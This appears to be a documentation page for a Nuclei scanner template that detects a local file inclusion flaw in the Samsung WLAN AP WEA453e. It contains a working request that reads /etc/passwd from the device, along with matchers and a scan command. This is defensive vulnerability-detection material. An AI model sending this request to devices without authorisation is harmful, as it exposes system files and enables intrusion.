Skip to content

Samsung WLAN AP WEA453e - Local File Inclusion

ID: samsung-wlan-ap-lfi

Severity: high

Author: pikpikcu

Tags: xss,samsung,lfi

Samsung WLAN AP WEA453e is susceptible to local file inclusion vulnerabilities.

id: samsung-wlan-ap-lfi
info:
name: Samsung WLAN AP WEA453e - Local File Inclusion
author: pikpikcu
severity: high
description: Samsung WLAN AP WEA453e is susceptible to local file inclusion vulnerabilities.
reference:
- https://omriinbar.medium.com/samsung-wlan-ap-wea453e-vulnerabilities-7aa4a57d4dba
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-22
metadata:
max-request: 1
tags: xss,samsung,lfi
http:
- method: GET
path:
- "{{BaseURL}}/(download)/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "bin:.*:1:1"
part: body
- type: status
status:
- 200
# digest: 4b0a00483046022100da1202516f32d7c08cc4c34a3d7dbcf64881fa24e3bbfebc1e7df075836af2640221009e07347dcfb0fdbb5f43428b02a31d2dc28ab2b091e99e997688eccd8d5befc3:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml"

View on Github